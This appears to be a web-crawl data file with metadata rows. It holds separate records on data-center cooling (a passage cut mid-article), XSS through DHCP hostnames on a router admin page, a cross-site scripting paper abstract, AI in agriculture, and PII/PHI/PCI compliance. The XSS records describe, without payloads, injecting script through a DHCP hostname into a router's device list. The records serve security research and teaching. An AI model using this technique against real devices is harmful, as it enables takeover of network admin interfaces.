These liquid cooling solutions enable higher density server deployments by effectively managing heat generation and reducing the risk of thermal throttling. With improved efficiency and enhanced heat dissipation capabilities, liquid cooling is becoming increasingly popular in data centers and high-performance computing environments.
External cool air can be used to help save money and energy in data centers. This is especially useful in areas with good climates. It's an efficient way to reduce the need for mechanical cooling. Free cooling systems use outside air or water to cool down a space instead of using energy-consuming machines. This can save you a lot of energy compared to using regular cooling methods.
By utilizing this approach, data centers can significantly reduce their energy consumption and operational costs while still maintaining optimal temperatures for their IT equipment. This environmentally friendly solution not only benefits the bottom line but also contributes to a more sustainable and greener data center infrastructure.
Computational Fluid Dynamics (CFD) Analysis
CFD analysis simulates airflow patterns within data centers, helping operators identify potential hotspots and optimize cooling distribution. By simulating and analyzing the movement of air, CFD analysis helps operators identify potential hotspots and optimize cooling distribution. This analysis takes into account various factors such as temperature differentials, airflows, and pressure gradients to provide a detailed understanding of the airflow within the facility.
Data center managers can use something called CFD analysis to look at the air flow patterns in their data centers. This helps them figure out where there is too much heat or not enough cooling. They can use this information to decide how to place equipment and design the layout of the data center. This way, they will use cooling resources wisely and save energy which will help make the data center run better and cost less money.
Monitoring and Automation
Implementing real-time monitoring and automation systems can greatly enhance cooling efficiency. By continuously monitoring temperature, humidity, and airflow, operators can identify any anomalies or deviations from optimal conditions. This proactive approach allows them to promptly adjust cooling parameters before potential issues escalate.
Additionally, automated control systems can dynamically allocate cooling resources based on demand, optimizing energy usage and reducing wastage. These systems use intelligence to manage the cooling system. They make sure that resources are used in the best way possible, which saves energy and makes cooling more efficient.
Real-time monitoring and automation systems give data center operators information that can help them do their jobs better. They also help the operators make changes quickly, which leads to better performance, more reliability, and lower costs.
As the demand for colocation services continues to rise, efficient cooling practices have become paramount to ensure optimal performance, reliability, and sustainability. Data center colocation generates significant amounts of heat due to the sheer volume of servers and IT equipment housed within them. Inadequate cooling not only leads to decreased performance but also increases the risk of system failures and downtime.
To solve this problem, data centers use special cooling equipment. This includes air conditioning systems that are very accurate, keeping cold and hot air separate, and using liquids to cool down. These methods help dissipate heat effectively and maintain stable temperature levels, ensuring that servers operate at peak efficiency. By implementing efficient cooling practices, data centers can minimize energy consumption, reduce their carbon footprint, and contribute to a more sustainable IT ecosystem.
Colocation is when businesses keep their important technology in another company's space. Cooling technologies help businesses save energy while keeping their IT safe. Hot aisle/cold aisle containment, liquid cooling, free cooling, CFD analysis, and monitoring automation are all good practices that can lead to energy efficiency.
Embracing these practices will not only reduce operational costs but also contribute to a greener and more sustainable future for the data center industry. | <urn:uuid:d655bd28-8888-4458-a3da-9e7aec323c8c> | CC-MAIN-2024-38 | https://www.datacenters.com/news/data-center-cooling-best-practices | 2024-09-19T20:32:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00541.warc.gz | en | 0.922433 | 1,298 | 2.546875 | 3 |
XSS through DHCP: How Attackers Use Standards
During a security assessment, we sometimes need to think outside of the box in order to find interesting and impactful exploits. To aid us in this, we can use protocol standards as a roadmap to assumptions that may be built into a piece of software. Oftentimes, breaking those assumptions means breaking the software. Software may be secure when well-behaved peers follow protocols standards, but have a vulnerability when they do not.
We recently had a good example of this concept on an assessment, where we violated the DHCP standard in order to perform Cross-Site Scripting (XSS) on a router’s admin interface page.
The router that we were testing, like many others, had a section of the web interface dedicated to listing the devices that were connected to the network. The devices are represented by their hostname — a field the router receives during DHCP IP address negotiation. This raises two very important questions: 1) what are the expected characters in a hostname; and 2) are the hostnames validated or escaped in any way? | <urn:uuid:0e1e41e0-efe7-4550-892d-6deb92ca0c39> | CC-MAIN-2024-38 | https://ivision.com/blog/how-attackers-use-standards/ | 2024-09-21T02:51:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00441.warc.gz | en | 0.966058 | 223 | 3.0625 | 3 |
The Anatomy of Cross Site Scripting
Cross site scripting (XSS) flaws are a relatively common issue in web application security, but they are still extremely lethal. They are unique in that, rather than attacking a server directly, they use a vulnerable server as a vector to attack a client. This can lead to extreme difficulty in tracing attackers, especially when requests are not fully logged (such as POST requests). Many documents discuss the actual insertion of HTML into a vulnerable script, but stop short of explaining the full ramifications of what can be done with a successful XSS attack. While this is adequate for prevention, the exact impact of cross site scripting attacks has not been fully appreciated. This paper will explore those possibilities.
Download the paper in PDF format here. | <urn:uuid:f7c442ac-d224-4e86-ae8c-b48a46211d18> | CC-MAIN-2024-38 | https://www.helpnetsecurity.com/2003/11/07/the-anatomy-of-cross-site-scripting/ | 2024-09-21T03:52:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00441.warc.gz | en | 0.944081 | 153 | 2.6875 | 3 |
AI in agriculture aids in the detection of pests, plant diseases, and undernutrition in farms. Artificial intelligence sensors can identify and target weeds before deciding which herbicide to use in the area. Precision agriculture, often known as artificial intelligence systems, is assisting in enhancing the overall quality and accuracy of harvests.
The role of computer vision
You need a lot of land to feed billions of people. These days, hand cultivation is not possible. At the same time, crop failures are frequently caused by pest infestations and plant diseases. Such invasions are challenging to spot and stop in the bud given the magnitude of modern agriculture operations.
This adds a new application for computer vision techniques. Aerial photography is used by growers to identify early indicators of plant disease or pests at the macro level and close-up photographs of leaves and plants at the micro level to identify crop illnesses. The common method for computer vision used in these studies is convolutional neural networks.
Please take note that we are using the term “computer vision” quite broadly here. Images are frequently not the most reliable sources of information. The greatest method to study many significant aspects of plant life is in other ways. It is frequently possible to gather hyperspectral images with specialized sensors or carry out 3D laser scanning to better understand plant health. In agronomy, such techniques are increasingly applied thanks to AI in agriculture.
Typically having a high resolution, this data type is more comparable to medical imaging than photos. AgMRI is the name of one of the field monitoring systems. Although specialized models are required to process this data, convolutional neural networks in particular can be used because of the spatial organization of the data.
Research on plant phenotyping and imaging is receiving millions of dollars. The primary task at hand is to gather sizable data sets on crops (often in the form of pictures or three-dimensional images) and contrast phenotypic information with plant genotype. The findings and information can be applied to advance global agriculture technologies. Agriculture is not the only sector to utilize smart artificial intelligence systems, AI in recruitment is also a hot topic. Did you know that Google Interview Warmup is assisting job seekers?
How robots are being utilized in agriculture?
Prospero and other autonomous agricultural robots have the ability to dig holes in the ground and plant seeds while adhering to established basic patterns and taking into account the unique features of the area. Robots are also capable of managing the growing process and interacting with each plant separately. Robots will harvest when the moment is perfect, once again treating each plant exactly as it should.
Swarm farming is the foundation of Prospero. Imagine a horde of little Prosperos crawling over the crops, leaving behind tidy, even rows of vegetation. It’s interesting to note that Prospero first surfaced in 2011, before the present deep learning revolution reached its pinnacle. Today, you may automate an increasing number of ordinary operations in agriculture thanks to the swiftly spreading use of robots.
Drones with automation spray crops. Drones that are small and agile can deliver dangerous substances more precisely than larger aircraft. In addition, aerial photography taken with sprayer drones can be utilized to collect data for the computer vision algorithms stated at the beginning of this article.
Robots designed specifically for harvesting are being created and deployed more and more. Combine harvesters have long been in use. Still, it has only recently been able to create, for instance, a robot that selects strawberries thanks to advances in computer vision and robotics.
Individual weeds can be recognized and mechanically removed by robots like Hortibot. This is another another fantastic achievement of contemporary robotics and computer vision, as it was previously impossible to discriminate between weeds and beneficial plants and employ manipulators to interact with little plants.
It is already evident that ML, AI, and robotics can function well in agriculture even though many agricultural robots are still prototypes or are only being tested on a small scale. It is safe to assume that in the near future, an increasing amount of agricultural activity will be mechanized.
There are now many more applications for AI in agriculture being developed. For instance, a Neuromation pilot project applies computer vision to the animal husbandry sector, a field that has not yet drawn significant interest from the deep learning community.
Machine learning and AI in agriculture
Of course, there have been initiatives to leverage livestock tracking data for machine learning. For instance, the Pakistani business Cowlar debuted a collar with the snappy motto “FitBit for Cows” that wirelessly monitors the activity and temperature of cows. French researchers are working on facial recognition technology for cows.
Additionally, there are initiatives to use AI in agriculture in pig farming, a hitherto underutilized sector with a market value of hundreds of billions of dollars. Pigs are housed in relatively tiny groups on modern farms, where the most comparable animals are chosen. Food is the primary expense in pig production, hence the major goal of contemporary pig production is to maximize the fattening process.
If the farmers had comprehensive knowledge of the pigs’ weight gain, they could be able to resolve this issue. Animals are often only weighed twice throughout their entire lives: at the start and the end of fattening. Experts could design a unique fattening regimen for each pig and even a unique mix of food additives if they knew how each piglet is gaining weight. This would greatly increase the production.
Although driving animals onto scales is not particularly difficult, it causes them a great deal of stress, and stressed pigs lose weight. The new AI research intends to create a novel, non-intrusive approach to animal weighing. The weight of pigs will be inferred from the photo and video data by Neuromation using a computer vision model. These estimates will be incorporated into the existing traditional, analytical machine learning models to enhance the process of fattening.
What is the future for AI in agriculture?
Agriculture and animal husbandry are sometimes viewed as outdated professions. Today, however, AI in agriculture is becoming a common instrument for many farms.
The primary cause of this is that there are numerous tasks in agriculture going on at once.
They are so complex that deep learning and contemporary artificial intelligence must be used in order to automate them. Although identical to one another, cultivated plants and pigs did not come off the same assembly line. Each tomato bush and each pig requires a unique method, thus up until very recently, human intervention was absolutely necessary.
We can solve challenges using current developments in artificial intelligence while also automating the technologies for interacting with plants and animals and taking into consideration their unique characteristics. Weighing a pig is simpler than learning how to pass the Turing test, and operating a tractor in a wide field is simpler than operating a car in heavy traffic.
Due to the fact that agriculture is still one of the world’s largest and most significant businesses, even a small improvement in efficiency will result in significant gains. That is why there are a lot of companies that are prioritizing AI in agriculture. We have also discussed AI in manufacturing, You can learn more about the future of Industry 4.0, by visiting our article. | <urn:uuid:77179bfd-eca6-43e1-b003-cd015b5b4b3c> | CC-MAIN-2024-38 | https://dataconomy.com/2022/07/25/ai-in-agriculture/ | 2024-09-08T21:37:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00641.warc.gz | en | 0.952795 | 1,463 | 3.515625 | 4 |
In the digital age, data privacy compliance is more than a legal obligation. It's a crucial aspect of business ethics and customer trust. Understanding the nuances of data privacy, however, can be complex. This is especially true when dealing with different types of personal data.
In this guide, we delve into three key types of personal data: Personally Identifiable Information (PII), Protected Health Information (PHI), and Payment Card Information (PCI). Each of these categories has its own set of regulations and compliance requirements. We'll explore the differences and similarities between PII, PHI, and PCI. We'll also discuss the regulations governing each type of data, such as GDPR for personal data, HIPAA for health information, and PCI DSS for payment card data.
Whether you're a business owner, a compliance officer, or an IT professional, this guide is for you. It's also for anyone involved in handling personal data, especially in sectors like healthcare, finance, and e-commerce.
Understanding the basics of personal data
Personal data is a broad term that encompasses various types of information. It refers to any data that can be used to identify an individual. It can also cover more sensitive data like health information or financial details.
Let's break down three key types of personal data: PII, PHI, and PCI. Each of these categories has its own unique characteristics and compliance requirements.
- PII: Personally Identifiable Information
- PHI: Protected Health Information
- PCI: Payment Card Information
Understanding these categories is the first step towards effective data privacy compliance.
What is Personally Identifiable Information (PII)?
Personally Identifiable Information, or PII, is any data that can be used to identify an individual. This can include names, addresses, and social security numbers. But PII can also include less obvious information; for example, IP addresses, login IDs, or device identifiers can also be considered PII.
The key is that if the information can be used to identify a person, either alone or in combination with other data, it's considered PII.
What is Protected Health Information (PHI)?
Protected Health Information, or PHI, is a subset of PII. It refers to any health-related information that can identify an individual. This includes medical records, lab results, and insurance information. It also covers conversations between doctors and patients, as well as billing information.
PHI is protected under the Health Insurance Portability and Accountability Act (HIPAA). This means it's subject to specific regulations and protections.
What is Payment Card Information (PCI)?
Payment Card Information, or PCI, refers to the data associated with a payment card. This includes the cardholder's name, the card number, and the expiry date. PCI also covers sensitive authentication data. This includes the security code on the back of the card as well as any PIN data.
PCI is protected under the Payment Card Industry Data Security Standard (PCI-DSS). This standard sets out specific requirements for the handling and protection of payment card data.
Data privacy regulations and compliance
Data privacy regulations are laws and guidelines that govern how personal data is collected, stored, and used. These regulations aim to protect individuals' privacy and prevent misuse of their information.
Different types of personal data are subject to different regulations. For example, PII is covered by GDPR, PHI is protected under HIPAA, and PCI is governed by PCI-DSS. Understanding these regulations is crucial for any organization that handles personal data. Noncompliance can result in hefty fines as well as reputational damage.
GDPR compliance and personal data
The General Data Protection Regulation, or GDPR, is a European Union regulation that governs the handling of personal data. It applies to all organizations that process the personal data of EU residents, regardless of where the organization is based. GDPR sets out a range of requirements for data protection. These include obtaining clear consent for data processing, protecting data against unauthorized access, and notifying authorities of data breaches.
GDPR also gives individuals certain rights over their data. These include the right to access their data, the right to correct inaccurate data, and the right to have their data deleted.
HIPAA and the protection of health information
The Health Insurance Portability and Accountability Act, or HIPAA, is a US law that protects health information. It applies to healthcare providers, health insurers, and other entities that handle health information. HIPAA establishes rules for the use and disclosure of Protected Health Information (PHI). It requires entities to implement safeguards that protect PHI, and to notify individuals of breaches of their PHI.
HIPAA also gives individuals certain rights over their health information. These include the right to access their health records along with the right to request corrections to their records.
PCI-DSS and the safeguarding payment card data
The Payment Card Industry Data Security Standard, or PCI-DSS, is a set of security standards for organizations that handle payment card information. It applies to all entities that store, process, or transmit cardholder data. PCI-DSS sets out a range of security requirements. These include maintaining a secure network, protecting cardholder data, and regularly monitoring and testing networks.
PCI-DSS also requires entities to maintain a policy that addresses information security. This policy should cover all aspects of the entity's operations, including employee training, incident response, and risk assessment.
The intersection of PII, PHI, and PCI
PII, PHI, and PCI are all types of personal data. However, they are not the same. Each type of data is subject to different regulations and has different protection requirements. Understanding the differences and similarities between PII, PHI, and PCI is crucial for data privacy compliance. It helps organizations to implement appropriate safeguards and comply with relevant regulations.
PII vs PHI: Understanding the overlap
Personally Identifiable Information (PII) is any information that can be used to identify an individual. This includes names, addresses, and social security numbers. Protected Health Information (PHI), on the other hand, is a subset of PII. It includes any health-related information that can identify an individual. Therefore, all PHI is PII, but not all PII is PHI. The main difference lies in the additional protections for health information under HIPAA.
PHI vs PCI: Where they diverge
Protected Health Information (PHI) and Payment Card Information (PCI) both involve sensitive data. However, they are regulated under different standards. PHI is protected under HIPAA, which sets out rules for the use and disclosure of health information. PCI, on the other hand, is governed by PCI-DSS, which sets out security standards for payment card data. The key divergence between PHI and PCI lies in the type of data they cover and the specific protections required.
PII vs PCI: Two distinctive elements
Personally Identifiable Information (PII) and Payment Card Information (PCI) are both types of personal data. However, PII includes any information that can identify an individual, while PCI specifically refers to payment card data. The main distinction between PII and PCI lies in the specific type of data they cover and the regulations governing their protection.
Best practices for data privacy compliance
Data privacy compliance is not a one-time task. It requires ongoing efforts and a comprehensive approach. Here are some best practices to ensure compliance with data privacy regulations.
1. Understand the specific compliance requirements related to the type of data you handle. This includes PII, PHI, and PCI. Each type of data is subject to different regulations and has different protection requirements.
2. Implement robust security measures. This includes data encryption, access controls, and regular audits. These measures help to protect data from unauthorized access and breaches.
Implementing robust security measures
Robust security measures are crucial for data privacy compliance. They help to protect data from unauthorized access and breaches.
Data encryption is one of the most effective security measures. It involves converting data into a code to prevent unauthorized access. Both data at rest and in transit should be encrypted.
Access controls are also important. They ensure that only authorized individuals have access to sensitive data. This includes implementing strong authentication measures and limiting access on a need-to-know basis.
Regular training and awareness programs
Training and awareness programs are the key to longstanding data privacy compliance, as they help to ensure that all employees understand the importance of data privacy and their role in protecting data.
Regular training should be provided to all employees. This includes training on data privacy regulations, the types of data they handle, and the consequences of noncompliance.
Awareness programs can also be effective. They help to keep data privacy at the forefront of employees' minds and encourage them to take an active role in protecting data.
Data Privacy Impact Assessments (DPIAs)
Data Privacy Impact Assessments (DPIAs) are a useful tool for data privacy compliance. They help to identify and mitigate risks associated with data processing activities.
DPIAs should be conducted for all new projects or systems that involve the processing of personal data. They help to identify potential privacy risks and implement measures to mitigate these risks.
Regular DPIAs can help to ensure ongoing compliance and identify any changes that may impact data privacy.
Incident response planning
Incident response planning is crucial for data privacy compliance. It helps to ensure a swift and effective response in the event of a data breach.
An incident response plan should outline the steps to be taken in the event of a breach. This includes identifying the breach, containing it, and notifying affected individuals.
Regular testing and updating of the incident response plan is also important. This helps to ensure that the plan is effective and up-to-date.
Navigating compliance across different sectors
Data privacy compliance is not a one-size-fits-all process. Different sectors have unique requirements and challenges. Understanding these nuances is key to effective compliance.
In the healthcare sector, for example, the handling of PHI is governed by HIPAA. In e-commerce and finance, businesses must comply with regulations like GDPR and PCI-DSS. Each sector requires a tailored approach to data privacy compliance.
Healthcare: HIPAA, ePHI, and beyond
In the healthcare sector, data privacy compliance is largely governed by HIPAA. This regulation protects PHI, including ePHI, which is health information in electronic form.
Healthcare providers, insurers, and their business associates must comply with HIPAA. This includes implementing safeguards to protect PHI, conducting regular risk assessments, and providing training to employees.
Beyond HIPAA, healthcare organizations must also consider state-specific laws and other regulations. This underscores the importance of a comprehensive, sector-specific approach to data privacy compliance.
E-commerce and finance: GDPR, PCI-DSS, and more
In the e-commerce and finance sectors, businesses handle a wide range of personal data. This includes PII and PCI, which are subject to regulations like GDPR and PCI-DSS.
GDPR applies to businesses that operate in or serve customers in the EU. It requires businesses to protect personal data and uphold individuals' data rights. PCI-DSS, on the other hand, sets standards for protecting payment card data.
In addition to these regulations, businesses in these sectors must also consider national laws, such as the CCPA in California. This highlights the complexity of data privacy compliance in e-commerce and finance.
Conclusion: The importance of data privacy compliance
In conclusion, data privacy compliance is a critical aspect of modern business operations. Understanding the differences and intersections between PII, PHI, and PCI is key to ensuring compliance and protecting sensitive data.
Whether you're in healthcare, e-commerce, finance, or any other sector, a robust and tailored approach to data privacy compliance is essential. By staying informed about regulations like GDPR, HIPAA, and PCI-DSS, and by implementing best practices, businesses can safeguard personal data, avoid hefty fines, and maintain public trust. | <urn:uuid:8c32f1b8-0e92-486e-8373-f59f5418afe8> | CC-MAIN-2024-38 | https://www.nightfall.ai/blog/pii-vs-phi-vs-pci-the-essential-guide | 2024-09-08T22:42:47Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00641.warc.gz | en | 0.929554 | 2,492 | 2.96875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.